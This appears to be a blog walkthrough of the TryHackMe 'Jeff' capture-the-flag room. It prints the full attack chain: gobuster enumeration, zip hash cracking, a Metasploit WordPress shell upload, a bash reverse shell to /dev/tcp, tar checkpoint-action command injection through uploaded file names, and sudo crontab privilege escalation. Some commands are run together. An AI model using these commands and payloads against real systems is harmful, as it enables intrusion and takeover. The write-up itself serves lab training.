Today in this writeup I gonna solve the TryHackMe Jeff Room it is a Hard room and I spend around two days on it and got some help from the community bypassing docker. Complete the jeff challenge lets get started.
TryHackMe Jeff Walkthrough
Answer the questions below
Hack the machine and obtain the user.txt flag.
HAck ItEscalate your privileges, whats the root flag?
HAck itAttack Description
Hi guys today I will explain how to complete the TryHackMe Room Jeff. When the machine boots scan the host using nmap and try to detect the open ports and services running on port 22 and 80. if we open the IP on firefox we notice it redirects to jeff.thm, add this host on /etc/hosts.
┌──(kali㉿PopLabSec)-[~]
└─$ sudo echo "10.10.10.125 jeff.thm" >> /etc/hosts
Scan the Host
After add the IP address in hosts file it’s time scann the host using nmap. As we can see we have two open ports.
On port 22 we have SSH 7.6p1 server running and on port 80 nginx as webserver. Let’s enumerate the webserver in order to find files and folders to investigate.
NGINX Enumeration
Open the jeff.thm domain on Firefox and investigate the website, I can’t find nothing useful on source code or robots.txt. Let’s use gobuster and enumerate system folders.
Bruteforcing Folders using gobuster
Open your terminal and execute the following command to find folders on NGINX webserver.
┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
The gobuster output detect some interesting folders, now let’s try to search jucy files inside each folder.
Admin Folder
Execute gobuster command to search for files inside admin folder:
┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/admin/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt 
Nothing useful inside tryhackme jeff admin folder, we just get the admin login page, i’ve tryed to brute force it without success.
Assets Folder
It’s time enumerate the backup folder, execute:
┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/assets/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
Backups folder was empty, move to the next folder.
Uploads Folder
┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/uploads/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
BackUp Folder
┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/backups/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
After searching for files inside all detected folders only the backups folder gave me something interesting a backup.zip file, let’s download the file.
Download Backup.zip file
┌──(kali㉿PopLabSec)-[~]
└─$ wget http://jeff.thm/backups/backup.zip
┌──(kali㉿PopLabSec)-[~]
└─$ unzip backup.zip 
┌──(kali㉿PopLabSec)-[~]
└─$ zip2john backup.zip > backup.hash
┌──(kali㉿PopLabSec)-[~]
└─$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
After unzip the backup.zip file with correct password we have a backup file from a WordPress blog.
cat wpadmin.bak 
Inside the backup file we have a wordpress password
Enumerate VHOSTS
gobuster vhost -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
Attack WordPress
After we add the new virtaul host info inside our /etc/hosts file we can access a new blog on the same server using WordPress CMS, if you have doubts on how to attack WordPress webite read my article about it.
┌──(kali㉿PopLabSec)-[~]
└─$ firefox http://wordpress.jeff.thm
Here we notice a one WordPress user called Jeff.
Let’s test our credentials
username : jeff - found as wordpress user
password : XXX-RFS-XXX password was found inside wpadmin.bck file
wpscan --url http://wordpress.jeff.thm -e uGet a Reverse Shell
metasploitmsf6 > use unix/webapp/wp_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcpmsf6 exploit(unix/webapp/wp_admin_shell_upload) > options
set PASSWORD XXX-RFS-XXX
set USERNAME jeff
set RHOSTS wordpress.jeff.thm
run
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.154.49/6666 0>&1'");
nc -lpn 6666
ftp_backup.php
Bypass Docker Container
use exploit/multi/handler
set lhost tun0
set lport 4444curl -v -P - -T "/var/www/html/shell.sh" 'ftp://backupmgr:SuperS1ckP4ssw0rd123!@172.20.0.1/files/'curl -v -P - -T "/var/www/html/--checkpoint=1" 'ftp://backupmgr:SuperS1ckP4ssw0rd123!@172.20.0.1/files/'curl -v -P - -T "/var/www/html/--checkpoint-action=exec=sh shell.sh" 'ftp://backupmgr:SuperS1ckP4ssw0rd123!@172.20.0.1/files/'
backupmgr@tryharder:~/.ftp/files$ python -c "import pty;pty.spawn('/bin/bash')"backupmgr@tryharder:~/.ftp/files$ export TERM=xterm
backupmgr@tryharder:/opt/systools$ ln -sf /var/backups/jeff.bak message.txt
backupmgr@tryharder:/opt/systools$ ssh jeff@jeff.thm -t "bash -l"
jeff@tryharder:~$ export PATH=/bin:/usr/bin:/usr/sbin:/usr/local/binjeff@tryharder:~$ /bin/cat user.txtTHM{HashMeLikeOneOfYour-RFS}
Privilege Escalation
jeff@tryharder:~$ /usr/bin/sudo -l
jeff@tryharder:~$ sudo /usr/bin/crontab -e
Read other TryHackMe writeups related to TryHackMe Jeff
TryHackMe WebAppSec 101Walkthrough
TryHackMe Vulnerability Capstone
Linux PrivEsc TryHackMe WriteUp